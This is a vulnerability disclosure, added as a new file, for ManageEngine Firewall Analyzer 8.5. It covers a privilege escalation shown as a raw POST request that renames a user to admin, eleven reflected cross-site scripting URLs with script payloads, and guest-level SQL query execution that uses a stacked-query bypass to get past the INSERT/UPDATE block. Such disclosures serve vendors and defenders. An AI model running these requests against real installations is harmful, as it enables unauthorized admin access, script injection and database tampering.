@ -0,0 +1,153 @@
+================================================================
+ManageEngine Firewall Analyzer 8.5– Privilege Escalation Vulnerability
+================================================================
+
+Description :
+
+Vulnerability Type : Privilege Escalation Vulnerability
+Vulnerable Version : 8.5
+Vendor Homepage:https://www.manageengine.com/products/firewall/download.html
+CVE-ID :
+Severity : High
+Author – Sachin Wagh (@tiger_tigerboy)
+
+ManageEngine Firewall Analyzer is an agent less log analytics and
+configuration management software that helps network administrators to
+centrally collect,
+archive, analyze their security device logs and generate forensic reports
+out of it.
+
+It allows an attacker to gain admin privileges.
+
+Proof of Concept URL
+--------------------
+
+1. Setup Burp and change user password and change username to admin.
+
+2. Burp Request :
+
+POST /fw/userManagementForm.do HTTP/1.1
+Host: localhost:8500
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101
+Firefox/43.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost:8500/fw/index2.do?url=archivedFiles&helpP=archivedFiles&completeData=true&tab=system&subTab=cal&flushCache=true&DateRange=false&timeFrame=LastWeek
+Cookie: leftPanel=230px; JSESSIONID=E58D08B4F3AF70279BBB128D713EADB7;
+JSESSIONIDSSO=A326C72CC526B521A8EA9286C7951F0C; FWA_TABLE=TS
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 159
+
+password=guest&email=guest%40adventnet.com
+&addField=false&userName=guest&userID=2&changePassword=true&isDemo=false&domainName=&productName=firewall&next=logoff
+
+#########################################################
+
+================================================================
+ManageEngine Firewall Analyzer 8.5– Multiple Cross-Site Scripting
+Vulnerability
+================================================================
+
+Description :
+
+Vulnerability Type : Multiple Cross Site Scripting Vulnerability
+Vulnerable Version : 8.5
+Vendor Homepage:https://www.manageengine.com/products/firewall/download.html
+CVE-ID :
+Severity : High
+Author – Sachin Wagh (@tiger_tigerboy)
+
+
+ManageEngine Firewall Analyzer is an agent less log analytics and
+configuration management software that helps network administrators to
+centrally collect,
+archive, analyze their security device logs and generate forensic reports
+out of it.
+
+ManageEngine Firewall Analyzer is prone to multiple cross-site scripting
+vulnerabilities because it fails to sanitize user-supplied input. An
+attacker may leverage these issues to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected site.
+
+Proof of Concept URL
+-----------------------------------------------------------------------------------------------------------------------------------
+
+1. http://localhost:8500/ResolveDNSConfig.nms?f4efe
+"><script>alert(1)</script>2b1254aa403=1
+2. http://localhost:8500/addDevCrd.nms?cba2d
+"><script>alert(1)</script>99328e18e3f=1
+3. http://localhost:8500/customizeReportAction.nms?flushAll=true&17eab
+"><script>alert(1)</script>d1bf001d67b=1
+4. http://localhost:8500/userIPConfig.nms?fe1b5
+"><script>alert(1)</script>62ff05628d3=1
+5. http://localhost:8500/viewListPageAction.nms?3078c
+"><script>alert(1)</script>fea0d816dfe=1
+6.
+http://localhost:8500/createAnomaly.nms?dc8c4%22%3E%3Cscript%3Ealert%281%29%3C/script%3E0c840168f94=1
+7. http://localhost:8500/createProfile.do?66342
+"><script>alert(1)</script>7cdd43cf7ed=1
+8.
+http://localhost:8500/fw/ResolveDNSConfig.nms?dnsOption=1&dnsMemorySize=10000&dnsUpdate=&dnsResult=&6adac%22%3E%3Cscript%3Ealert%281%29%3C/script%3E619a9b8bff2d28708=1
+9.
+http://localhost:8500/fw/index2.do?url=advSrchAction&tab=search&sMode=adv&subTab=advSrch&3602d%22%3E%3Cscript%3Ealert%281%29%3C/script%3E4bb604792b5eb3ace=1&DateRange=&flushCache=&additionalParams=sMode%3dadv%26subTab%3dadvSrch%26tab%3dsearch%26url%3dadvSrchAction&functionName=&to=2016-01-15+00%3a00+++2016-01-15+12%3a35&uniqueReport=null
+10.
+http://localhost:8500/searchAction.do?fd272%22%3E%3Cscript%3Ealert%281%29%3C/script%3Eace8dfca87a=1
+11.
+http://localhost:8500/uniquereport.do?baseUrl=uniquereport&resourceName=SimulatedFirewall1&displayName=SimulatedFirewall1&reportId=1&resourceType=Firewall&divid=Firewall_1&divType=block&applyTimeCriteria=true&7db2f%22%3E%3Cscript%3Ealert%281%29%3C/script%3E8d3926f45f8=1
+
+#########################################################
+
+================================================================
+ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability
+================================================================
+
+Description :
+
+Vulnerability Type : ManageEngine Firewall Analyzer 8.5 SQL Query Execution Vulnerability
+Vulnerable Version : 8.5
+Vendor Homepage:https://www.manageengine.com/products/firewall/download.html
+CVE-ID :
+Severity : High
+Author – Sachin Wagh (@tiger_tigerboy)
+
+ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect,
+archive, analyze their security device logs and generate forensic reports out of it.
+
+The vulnerability exists due to an error in the RunQuerycommand.  An authenticated, remote attacker could exploit
+this vulnerability via a crafted POST request.  An exploit could allow the attacker to execute arbitrary SQL queries on the  underlying database server.
+
+Every user has the ability to execute SQL queries through the "/fw/runQuery.do" script, including the default "guest" user.
+
+Below is the POST request, executed as "guest":
+
+POST /fw/runQuery.do HTTP/1.1
+Host: localhost:8500
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8500/fw/runQuery.do
+Cookie: username=guest; password=8094789293; leftPanel=230px; JSESSIONID=3590F06EA06BBA9B0FC9A40405E1144F; JSESSIONIDSSO=96016151FC34CD1EA17192C6AF288A14; FWA_TABLE=TS
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 123
+
+execute=true&DatabaseType=postgres&query=select version()
+
+Access to queries starting with "INSERT" or "UPDATE" giving warning as "operation not permitted"
+
+But When executed query, like this:"SELECT 1;INSERT INTO ..." its not giving any warning.
+
+
+Affected Product:
+------------------------------------------------------------------------------------------------------------
+
+Vulnerable Product:
+                                [+]  ManageEngine Firewall Analyzer 8.5
+
+Credits & Authors
+-------------------------------------------------------------------------------------------------------------
+Sachin Wagh (@tiger_tigerboy)